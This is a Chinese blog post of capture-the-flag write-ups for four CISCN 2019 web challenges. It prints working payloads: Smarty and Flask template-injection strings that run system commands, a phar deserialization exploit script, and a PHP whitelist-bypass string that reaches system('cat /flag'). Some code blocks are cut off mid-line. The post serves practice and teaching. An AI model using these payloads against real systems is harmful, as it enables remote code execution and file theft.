CISCN2019web刷题记录

作者 : admin 本文共6375个字,预计阅读时间需要16分钟 发布时间: 2024-06-16 共1人阅读

[CISCN2019 华东南赛区]Web11

CISCN2019web刷题记录插图

考察知识点

1.SSTI(smarty模板)

2.X-Forwarded-For(HTTP请求头字段)

注意最下面的Build With Smarty! , 猜测是smarty模板注入。smart是php的模板引擎,模板引擎的作用就是分离前端页面和数据的,题目中显示API的URL由于环境的原因无法使用,但我们的IP依旧显示在了页面的右上角,且根据它的提示XFF我们很容易想到,在X-Forwarded-For里构造ssti:payload。

开始用bp抓包,然后插入X-Forwarded-For:{$smarty.version}来看一下版本。

CISCN2019web刷题记录插图(1)

CISCN2019web刷题记录插图(2)

回显,版本为3.1.30,说明是smarty模板注入
同时回显中也可发现,php版本是7.3.5,那么这样的话 ,就无法使用同时smarty的版本是3,所以{php}{/php}也无法使用。
但是smarty的if标签也可以执行php代码

虽然php标签不能用,但是还有个{if}标签。
Smarty的{if}条件判断和PHP的if 非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if}. 也可以使用{else} 和 {elseif}. 全部的PHP条件表达式和函数都可以在if内使用,如*||*,or,&&,and,is_array(), 等等

既然全部的PHP条件表达式和函数都可以在if内使用,那我们在里面写php代码也行。

通过一串代码{if phpinfo()}{/if}来了解一下,它的漏洞为什么会产生。

  因为smarty中的{if}标签中可以执行php语句

构建payload1

{if readfile('/flag')}{/if}

插入X-Forwarded-For:{if readfile('/flag')}{/if}

CISCN2019web刷题记录插图(3)

在网站里查看一下html代码就可以找到flag了。

CISCN2019web刷题记录插图(4)

PS

payload2:{if system(‘cat /flag’)}{/if}

payload3:{if system(‘cat /flag’)}{/if}

[CISCN 2019华北Day1]Web1

考点:代码审计,phar反序列化

参考文章:[CTF]PHP反序列化总结_Y4tacker的博客-CSDN博客_ctf php反序列化

前置知识

要简单了解的是phar的四个部分:

1,stub

phar 文件的表示,以 xxxxxx 为固定形式,前面内容可以变,点必须 __HALT__COMPILER();?>结尾。

2,a mainfest describing the contents

该部分是phar文件中被压缩的文件的一些信息,其中meta-data部分的信息会被序列化,即执行serialize()函数,而phar://就相当于对这部分的内容进行反序列化,此处也正是漏洞点所在。

3,the file contents

这部分存储的是文件的内容,在没有其它特殊要求的情况下,这里面的内容不做约束。

4. a signature for verifying Phar integrity

数字前面 ,在最末尾。

前提条件

1.. phar 文件可以上传至服务器。

2. 文件操作入 file_exists() .file_get_content(),fopen() ,要有可利用的魔术方法作为跳板

3.文件流参数可控,且phar://协议可用  /  phar 等特殊字符没有被过滤

打开题目后,一个登录页面

CISCN2019web刷题记录插图(5)

随便注册一下,登录上去

CISCN2019web刷题记录插图(6)

注意左上角有一个上传文件,我们先随便建个文档上传提交,发现它要求得文件类型只能是gif/jpg/png的类型,然后进一步测试发现,只更改文件后缀名是没有用的,需要抓包更改其Content-Type为image/jpeg或其它图片格式的对应字符串。

也可以参考一下这个大佬的文章

[CISCN2019 华北赛区 Day1 Web1]Dropbox-CSDN博客

这时候构造phar.phar进行上传

pop链:

filename = '/flag.txt';
            $this->files = array($file);
            $this->results = array();
            $this->funcs = array();
        }
    }

    class File {
        public $filename;
    }

    ini_set('phar.readonly',0);

    @unlink("phar.phar");
    $phar = new Phar("phar.phar"); //后缀名必须为phar

    $phar->startBuffering();

    $phar->setStub(""); //设置stub

    $o = new User();
    $o->db = new FileList();

    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("exp.txt", "glzjin"); //添加要压缩的文件
    //签名自动计算

    $phar->stopBuffering();
?>

注意:想要生成phar文件记得把php.ini中的phar.readonly选项设置为Off,否则将无法生成phar文件

构造出来的phar.phar重新命名为phar.jpg然后进行上传

CISCN2019web刷题记录插图(7)

之后访问/delete.php、post传参filename=phar://phar.jpg/exp.txt得到flag

CISCN2019web刷题记录插图(8)

[CISCN 2019初赛]Love Math

打开题目,源码如下

CISCN2019web刷题记录插图(9)

 = 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '	', '\r', '
','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_-ÿ][a-zA-Z_0-9-ÿ]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

先进行代码审计:这段PHP代码是一个数学计算器,它接受一个GET参数c,然后对其进行计算。首先,它会检查参数c是否包含非法字符或函数,如果包含,则返回错误信息。如果参数合法,它将使用PHP的数学函数进行计算并输出结果。

黑名单字符:单双引号(‘ “)、反引号(`)、中括号([ ])。这里说明几点:

单双引号的禁用说明字符串是无法使用的,可以用返回值为字符串的函数返回。
反引号的禁用说明无法使用命令执行,
中括号是用来访问数组的元素,可以用花括号({})代替。
白名单是一系列的数学函数。首先在里面寻找能够返回字符串的函数,

  • base_convert:2到36进制之间的任意转换。
  • decbin:十进制转到二进制。
  • dechex:十进制转换为十六进制。
  • decoct:十进制转换为八进制。

我们的最终目标通过最后一句代码,

 eval('echo '.$content.';');

执行语句system(“cat /flag”)

黑名单中禁止了引号",这一点利用动态函数的性质绕过,即字符串做函数名,加上括号即可被当作函数执行,如下:

c=($_GET[a])($_GET[b])&a=system&b=cat /flag

_GET通过白名单中的编码函数得到,PL如下

base_convert(37907361743,10,36)(dechex(1598506324))

考虑能将某种进制的数字字符串转换成特定字符串的函数,类似hex2bin(),因为 hex2bin() 接收的十六进制数字字符串(”5f474554″)可以由整型数字(1598506324)通过 dechex() 函数转换得到,而 hex2bin() 返回一个特定的字符串。

1.base_convert(37907361743,10,36)=>“hex2bin”
2.dechex(1598506324)=>“5f474554”
3.hex2bin(“5f474554”)=>_GET

用白名单中的变量pi来保存一下

构建最后payload:

?c=$pi=base_convert(26941962055,10,34)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag

$pi=_GETpi=system,cos=cat /flag分号后面语句的$$pi就是$_GET
翻译过来分号后面就是_GET{pi}(_GET{cos})&pi=system&cos=cat /flag

通俗的讲

根据代码意思,应该就是通过使用白名单函数或者当成变量来使用,同时要求长度小于80

看到最后的exec,我们需要构造出system($_GET[‘a’]),而这个已经被挡住了,我们可以传入a=system,b=cat /flag来获取flag

但还是需要得到_GET,另外中括号可以用大括号代替

base_convert(number,frombase,tobase);

将number从frombase进制转化为tobase进制

hex2bin()

把十六进制值转换为 ASCII 字符:

dechex()

把10进制转换为16进制

有base_convert(26941962055,10,34)即hex2bin   26941962055是base_convert(“hex2bin”,34,10)得来的,至于为什么34,我试过34之前的,都无法完整拼出henx2bin,到34就能

然后找到_GET的ascii码之后再转为16进制之后10进制即1598506324

dechex(1598506324)得到_GET的16进制,再通过hex2bin得出_GET

最后构建出payload

?c=$pi=base_convert(26941962055,10,34)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag

CISCN2019web刷题记录插图(10)

[CISCN2019 华东南赛区]Double Secret

进入环境

CISCN2019web刷题记录插图(11)

查看源码、抓包都没有发现特别的提示,可以用御剑扫一扫后台目录,发现了/secret这个路径,访问一下,页面内容为Tell me your secret.I will encrypt it so others can’t see,猜测是GET型传参,试试/secret?secret=1,回显d,综合来看是对传入的secret进行了某种加密后回显。几经尝试,

当传入?secret=11111时,页面报错,多传点东西也会报错。

CISCN2019web刷题记录插图(12)

在报错页面发现了app.py的报错,点开有部分源码泄露

CISCN2019web刷题记录插图(13)

逻辑就是对传入的secret进行RC4加密,且密钥已知,safe()函数猜测是对恶意代码的过滤,然后模板渲染。这是flask的模板,而且用了render_template_string,很明显存在ssti(flask 模板注入漏洞

RC4加密
先来看看RC4加密解密,RC4(来自Rivest Cipher 4的缩写)是一种流加密算法,密钥长度可变。它加解密使用相同的密钥,因此也属于对称加密算法。所谓对称加密,就是加密和解密的过程是一样的。RC4加密原理很简单,只需要一个KeyStream与明文进行异或即可,密钥流的长度和明文的长度是对应的。RC4算法的的主要代码还是在于如何生成秘钥流。

用一下大神的脚本

import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
    # print("RC4加密主函数")
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt
def rc4_init_sbox(key):
    s_box = list(range(256))
    # print("原来的 s 盒:%s" % s_box)
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    # print("混乱后的 s 盒:%s"% s_box)
    return s_box
def rc4_excrypt(plain, box):
    # print("调用加密程序成功。")
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    print("%s" %quote(cipher))
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{lipsum.__globals__.__builtins__.eval(\"__import__('os').popen('cat /flag.txt').read()\")}}")

跑一下就可以了

CISCN2019web刷题记录插图(14)

构建payload

/secret?secret=.%14U%5C%C2%BA%14%1Ec%25%C2%A2%C3%A7%14%C2%B2%C2%BD%C3%B4%C2%A98%C2%80k%0B%C3%B9m%C3%9Fp%1F%C2%984%C2%9D%5B%C3%82%21%C3%98%12%C3%85H%C3%80%09%C3%BD%60%C2%A6D%C3%A5%C2%84%C3%AF%7D%01%C2%AF%0E%C2%9A%C2%82%0E%2Bm%C3%B8m%25%C3%99/G%C3%94%C2%BCDY%C2%B2%C2%97%18%C2%AE%09uB%3B%C3%A8H%C2%95-%C3%B8h%C3%94%21%17%2C3D%C2%8B%C2%9E%12%C3%BA%C3%BF%C2%BB%C3%9A

就拿到flag了。

CISCN2019web刷题记录插图(15)

本站无任何商业行为
个人在线分享-虚灵IT资料分享 » CISCN2019web刷题记录
E-->